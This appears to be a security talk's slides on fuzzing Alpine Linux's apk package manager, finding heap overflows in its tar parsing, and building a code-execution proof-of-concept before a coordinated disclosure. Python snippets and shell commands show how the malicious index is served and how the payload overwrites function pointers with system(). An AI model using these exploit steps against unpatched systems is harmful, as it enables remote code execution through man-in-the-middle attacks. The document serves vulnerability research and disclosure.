From vulnerability discovery to code execution Exploiting Alpine Linux By Ariel Zelivansky, Security Researcher
What is Alpine Linux?
● Lightweight Linux distribution
● Alpine’s motto: Small, simple and secure
● Alpine docker image only 5 MB in size
● Security in mind
○ The kernel is patched with a port of grsecurity/PaX
○ Userspace binaries compiled as PIE, NX enabled, full RELRO,
with stack smashing protection
Who uses Alpine?
● Alpine has become widely popular for use with containers (10M+ pulls)
● Many Docker images are now based on Alpine
● Docker has officially stated their support of Alpine
Researching Alpine
● What does an alpine container consist of?
○ musl libc
○ busybox userspace binaries
○ apk-tools
● What do people do with Alpine containers?
○ Download more programs!
○ apk - Alpine’s package manager
Apk
● A tool to install, upgrade and delete packages (aka a package manager)
● Historically a collection of shell scripts, now written in C
● To add a package - apk update and apk add [name]
○ Or just apk add [name] -U/--update
● Can I somehow alter packages or convince apk to downgrade packages?
Apk
● Documentation first (Alpine’s wiki)
○ /etc/apk/repositories - list of local/remote repositories
○ The default Docker image uses plain HTTP
● Prone to MITM attack
● Fortunately, an attack is not so simple
○ Packages are signed
○ See /etc/apk/keys
● What about update?
○ “A repository is simply a directory with a collection of *.apk files. The directory must include a
special index file, named APKINDEX.tar.gz to be considered a repository.”
○ Update essentially downloads and parses the APKINDEX.tar.gz file
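Since the index is an ordinary gzip-compressed tar archive, its members can be listed with standard tooling. The sketch below builds a tiny stand-in archive in memory and lists it; the member names are illustrative assumptions, not taken from a real repository.

```python
import io
import tarfile


def list_members(archive_bytes):
    """Return the member names of a gzip-compressed tar archive."""
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        return tar.getnames()


def build_sample_index():
    """Build a small stand-in index archive (member names are assumptions)."""
    members = [
        (".SIGN.RSA.example.rsa.pub", b"signature bytes"),
        ("DESCRIPTION", b"sample repository"),
        ("APKINDEX", b"P:example\nV:1.0-r0\n"),
    ]
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in members:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


print(list_members(build_sample_index()))
```

Pointing `list_members` at the bytes of a downloaded APKINDEX.tar.gz would show what `apk update` actually has to parse.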
Apk
● Signature inside archive?
● Sounds like fuzzing time
○ What’s fuzzing?
○ american fuzzy lop (afl-fuzz)
■ Finds lots of bugs (and vulnerabilities) in open source software projects
■ Compile with afl-gcc to instrument file
Apk
● Clone apk-tools from alpine’s git repository
● Empty README
● Relevant code seems likely to be in update.c
● main is in apk.c
● After inspecting the code for a while, it appears each action is defined as an applet
Apk
● update.c doesn't seem to do anything
○ The actual code, in database.c, checks for the APK_UPDATE_CACHE flag
○ After briefly studying the code, I was ready to fuzz it
● Writing my own applet
○ Read data from file (fuzzer will provide)
○ Call apk_bstream_from_file to read the file
○ Call apk_db_index_read with the data
○ Define applet, add to Makefile
● Running afl inside docker container
○ Easy to set up and reproduce
Fuzzing Apk
● Fuzzer does nothing
● Tried fuzzing several other functions, tweaking the code to make them fuzzable
● Finally, decided on fuzzing apk_tar_parse
○ Looks promising
Fuzzing Apk
● Fuzzing was very slow in my experience
● Diving into the code again
○ Removed anything I didn't need that might slow down the fuzzer
○ init_openssl
○ apk_db_init / apk_db_open
● Fuzz time
Fuzzing Apk
● Multiple crashes
● Triaging crashes with crashwalk
○ Runs through all crashes and identifies the crash type
○ Suggests whether each crash is exploitable
○ The final summary showed 6 distinct crashes
Reproducing the crash
● So far I was only able to reach the crashes in my modified code
● To reproduce with the real apk, I used a crash as a bad tar.gz file
○ cat crash | gzip -9 > ~/docker/files/alpine/v3.6/main/x86_64/APKINDEX.tar.gz
○ Served the file from my local server
○ docker run -ti --add-host dl-cdn.alpinelinux.org:172.17.0.2 alpine:3.6
○ Upon running apk update, a segfault occurred!
● After a debugging session with gdb, I determined the origin of the crash
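The `cat crash | gzip -9 > ...` step can also be scripted. This is a minimal sketch that compresses a crash input and places it at the repository path from the slide; the function name and the temporary web root are assumptions for illustration.

```python
import gzip
import tempfile
from pathlib import Path

# Path the slide uses for the index inside the local web root.
INDEX_RELATIVE_PATH = Path("alpine/v3.6/main/x86_64/APKINDEX.tar.gz")


def publish_crash_as_index(crash_bytes, web_root):
    """Gzip a crash input (level 9) and write it where apk expects the index."""
    target = Path(web_root) / INDEX_RELATIVE_PATH
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_bytes(gzip.compress(crash_bytes, compresslevel=9))
    return target


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        path = publish_crash_as_index(b"placeholder crash input", root)
        print(path.relative_to(root))
```

The web root can then be served with any static file server, for example `python3 -m http.server --directory <web_root>`.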
Explaining the bugs
● The result is two (similar) heap overflow vulnerabilities
● Let’s examine the relevant code (inside archive.c)
● A tar archive consists of 512-byte blocks, with a header block at the start of each file
○ apk reads the tar stream in chunks and runs a callback function on each chunk
● One of the fields of the header is a typeflag
○ One of its uses is to indicate special blocks, such as the “GNU long name extension”
○ This extension indicates that the following block holds the name of the file (which is otherwise limited to 100 bytes)
● How is this implemented?
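Before looking at apk's implementation, the header layout described above can be sketched in Python. The example uses the standard `tarfile` module to generate a GNU long-name entry and then reads the name, size and typeflag fields at their fixed offsets; `parse_header` is a hypothetical helper, not apk code.

```python
import tarfile

BLOCK_SIZE = 512
GNU_LONGNAME = b"L"  # typeflag of the GNU long name extension


def parse_header(block):
    """Extract the name, size and typeflag fields from one 512-byte header."""
    name = block[0:100].split(b"\0", 1)[0].decode("ascii")
    size_text = block[124:136].split(b"\0", 1)[0].decode("ascii").strip()
    size = int(size_text or "0", 8)  # sizes are stored as ASCII octal
    typeflag = block[156:157]
    return name, size, typeflag


# A 128-character name does not fit in the 100-byte name field.
long_name = "d/" * 60 + "file.txt"
raw = tarfile.TarInfo(long_name).tobuf(format=tarfile.GNU_FORMAT)

# Block 0: long-name header, block 1: the name itself, block 2: real header.
name, size, typeflag = parse_header(raw[:BLOCK_SIZE])
stored_name = raw[BLOCK_SIZE:BLOCK_SIZE + size].rstrip(b"\0").decode("ascii")

print(typeflag == GNU_LONGNAME, size, stored_name == long_name)
```

The size field of the special block tells the parser how many bytes of name to read next, which is why that field matters for the bug.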
Explaining the bugs
● Uses blob_realloc to allocate the buffer for the name
Explaining the bugs
● int is naturally signed
○ b->len is long, also signed
○ The comparison is signed
● Any size above the maximum signed int (0x7fffffff), i.e. 0x80000000 or more, is treated as negative, so the buffer is left unmodified
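The signed comparison can be modeled in Python. This is a sketch of the behavior described on the slide, not the apk-tools source: `Blob` and `blob_realloc_model` are hypothetical stand-ins, and `ctypes.c_int32` is used to mimic how an oversized value wraps when passed as a 32-bit `int` on common platforms.

```python
import ctypes


def to_c_int(value):
    """Truncate a Python integer the way a 32-bit signed int would hold it."""
    return ctypes.c_int32(value).value


class Blob:
    """Stand-in for a length-tracked heap buffer."""

    def __init__(self):
        self.len = 0
        self.buf = bytearray()


def blob_realloc_model(blob, size):
    """Grow the blob to `size` bytes unless it already looks large enough."""
    size = to_c_int(size)      # the parameter is a signed int
    if blob.len >= size:       # signed comparison: a negative size always passes
        return False           # buffer left unmodified
    blob.buf.extend(bytes(size - blob.len))
    blob.len = size
    return True


blob = Blob()
print(blob_realloc_model(blob, 64), blob.len)          # grows to 64 bytes
print(blob_realloc_model(blob, 0x80000000), blob.len)  # wraps negative, no growth
```

The caller still believes it has room for the requested size, which sets up the overflow on the next read.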
Explaining the bugs
● In the following call to is->read, a huge number of bytes is copied into the buffer
○ AKA Heap overflow
○ As long as is->read accepts the size as unsigned
○ In the case of a tar.gz, is->read is gzi_read which accepts size_t (unsigned)
Explaining the bugs
● So to fix, make blob_realloc accept size_t!
○ Yes, but also make sure entry.size is not max int (because a +1 would overflow it)
● A similar bug occurred with a pax header block (another special block)
Developing an exploit
● I built a minimalistic tar file
○ To trigger the bug, I put a longname block with a
negative size
○ In tar, the size is an octal number in ASCII; I went with 0o77777777777 (which truncates to -1 as a signed 32-bit integer)
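The arithmetic behind that size value can be checked directly. The sketch assumes the decoded value passes through a 32-bit signed integer and is later widened to 64 bits; `decode_octal` is a hypothetical helper.

```python
import ctypes

# 11 octal digits plus a terminator fill the 12-byte tar size field.
SIZE_FIELD = b"77777777777\0"


def decode_octal(field):
    """Decode a NUL-terminated ASCII octal field."""
    return int(field.split(b"\0", 1)[0].decode("ascii"), 8)


raw_value = decode_octal(SIZE_FIELD)
as_int32 = ctypes.c_int32(raw_value).value   # keep only the low 32 bits, signed
as_uint64 = ctypes.c_uint64(as_int32).value  # sign-extend, view as unsigned

print(hex(raw_value))  # 0x1ffffffff
print(as_int32)        # -1
print(hex(as_uint64))  # 0xffffffffffffffff
```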
Developing an exploit
● The execution crashed as expected
○ The crash was on the write of the terminating null byte meant for the entry.name buffer
○ entry.name was not allocated, so it pointed to null
○ entry.size was 0xffffffffffffffff (implicitly widened to 64 bits, since it is of type off_t)
Developing an exploit
● I created another file, with two blocks
○ First block to allocate the buffer with a size I want
○ Second block exploits the vulnerability against the allocated buffer
● Debugging the execution, it seems everything goes as expected
○ The buffer is allocated then overwritten
○ The code works to my advantage - is->read is gzi_read
■ gzi_read copies chunks from the source stream to the target and stops once the source runs out!
■ No need to worry about the source’s size
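A toy model shows why a copy loop bounded only by the source is enough for an overflow. The heap here is just a `bytearray` with a 16-byte name buffer followed by neighboring data; the layout, names and chunk size are assumptions for illustration, not the real allocator state.

```python
def read_until_exhausted(heap, dest_offset, source, chunk_size=4):
    """Copy `source` into `heap` chunk by chunk without checking the
    capacity of the destination buffer, stopping when the source ends."""
    written = 0
    while written < len(source):
        chunk = source[written:written + chunk_size]
        start = dest_offset + written
        heap[start:start + len(chunk)] = chunk
        written += len(chunk)
    return written


NAME_CAPACITY = 16
# The name buffer is followed directly by another heap object.
heap = bytearray(b"\0" * NAME_CAPACITY + b"NEIGHBOR")

# 20 bytes of input for a 16-byte buffer: 4 bytes spill into the neighbor.
copied = read_until_exhausted(heap, 0, b"A" * 20)

print(copied, bytes(heap[NAME_CAPACITY:]))
```

The attacker controls how far the write goes simply by choosing how much data the stream contains.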
Developing an exploit
● There are various known ways to exploit a heap overflow
○ Remember musl libc? Memory allocation (malloc, realloc) is done by it
○ I preferred not to research it
○ I can work around that by building the exploit on apk's own code instead
■ Is there anything useful on the heap? A flag to change? Structs with callbacks?
■ I could simply change a callback address to execv or system
● Mitigations?
○ ASLR
○ For the sake of a proof-of-concept, ignoring ASLR
Developing an exploit
● Lots of trial and error, trying to find structs after entry.name I should overwrite
● I realized I can just use the is struct, which is used on is->read
● It is of type apk_istream
● I put a breakpoint on the call to is->read
● I calculated the delta between my buffer (entry.name) and the is struct
Developing an exploit
● I filled my tar file with 0x153a0 bytes, followed by 16 zero bytes
● It worked!
○ The execution crashed at address 0x0000000000000000
● Next step - call system with a string I control
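The payload shape from this slide can be sketched as filler up to the measured delta, then 16 bytes that land on the start of the is struct. The sketch assumes 64-bit little-endian pointers and that the two overwritten fields are get_meta followed by read; `build_payload` is a hypothetical helper.

```python
import struct

# Distance from entry.name to the is struct, as measured on the slide.
DELTA = 0x153a0


def build_payload(delta, get_meta=0, read=0):
    """Filler up to the target struct, then two 8-byte pointer values."""
    filler = b"A" * delta
    return filler + struct.pack("<QQ", get_meta, read)


payload = build_payload(DELTA)
print(len(payload), payload[-16:] == bytes(16))
```

With both values left at zero, the next call through the overwritten pointer jumps to address 0, matching the crash observed above.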
Developing an exploit
● is->read parameters?
○ is->read(is, entry.name, entry.size);
● Since the first parameter is the is struct itself, I could overwrite its first 8 bytes with my shell string
○ The first 8 bytes hold the get_meta pointer, which is not called in our context
○ I used “echo 1” as the string
○ It worked!
● New problems
○ Shell string limit is 8 bytes, too short
○ The next day I failed to reproduce the exploit
■ is->read seems to write the data in chunks, so it writes only 4 bytes and then calls is->read again (through a pointer that is only partly modified)
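The 8-byte limit follows from how a C string is read out of the struct's memory. In this sketch the struct is modeled as an 8-byte slot followed by an 8-byte pointer; the address is a placeholder and `fake_istream` and `c_string_at` are hypothetical helpers.

```python
import struct

# Placeholder value standing in for the address of system().
HYPOTHETICAL_SYSTEM_ADDR = 0x4141414142424242


def fake_istream(command, read_ptr):
    """Pack a command into the first 8-byte slot, followed by a read pointer."""
    if len(command) + 1 > 8:
        raise ValueError("command plus terminator must fit in 8 bytes")
    return struct.pack("<8sQ", command, read_ptr)  # "8s" pads with NUL bytes


def c_string_at(memory, offset=0):
    """Return the bytes a C function would treat as a string at `offset`."""
    return memory[offset:memory.index(b"\0", offset)]


blob = fake_istream(b"echo 1", HYPOTHETICAL_SYSTEM_ADDR)
print(c_string_at(blob))  # b'echo 1'
```

Anything longer than 7 characters plus the terminator would run into the pointer that follows, which is why a longer command needs a different location.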
Developing an exploit
● How would I find what’s after the is struct?
● I restored the is struct inside the file (copying the actual addresses)
● I added random bytes after it
● gis->bs pointer seems like a good choice
● It is of type apk_bstream
Developing an exploit
● gis->bs->read is used in the same manner as is->read
● It has 8 more bytes to use for the shell string (used for flags)
● This time I overwrote a pointer to the struct, whereas with is I had overwritten the struct itself
● I put my data just 32 bytes before the is struct
○ I could put it anywhere I have control of
Fake struct layout: gis->bs->flags, gis->bs->get_meta, gis->bs->read (overwritten to system), gis->bs->close, is->get_meta….
Developing an exploit
● It works!
Demonstration
Real attack vector
● Man-in-the-middle in an organization
○ Attacker gets code execution on any alpine
package install or update
○ Attacker gets code execution on building alpine
images
○ Signature did not help since it’s taken from inside
the tar
Final steps
● I’ve found a vulnerability, what next?
● Responsible/Coordinated disclosure
○ Estimate the impact, write a proof-of-concept if it makes sense
○ Contact the developers
■ Nearly always privately; you don't want premature public disclosure
■ Work on a fix
○ Assign CVE IDs
■ Check for the correct CNA (CVE Numbering Authority)
■ Otherwise contact MITRE through their web form
○ Disclose the vulnerability online
■ For open source the oss-security mailing list is a good choice
Final steps
● The bugs I found affect all apk versions since 2.5.0_rc1
● I reached alpine’s developers on IRC
○ Discussed the issues with Timo Teräs in private emails
○ A patch was released very quickly and was pushed to apk-tools 2.7.2 and 2.6.9
■ All alpine versions from current to 3.2-stable include the fix
○ Besides fixing the bugs, Timo also implemented additional hardenings to restrict
attackers from creating a similar exploit
■ This is done by removing the use of function pointers that are saved on structs on the
heap
● I sent an advisory to oss-sec and wrote about the issue on the Twistlock blog
Future ideas
● Fuzzing other parts of apk
● Fuzzing other alpine tools
● Fuzzing libfetch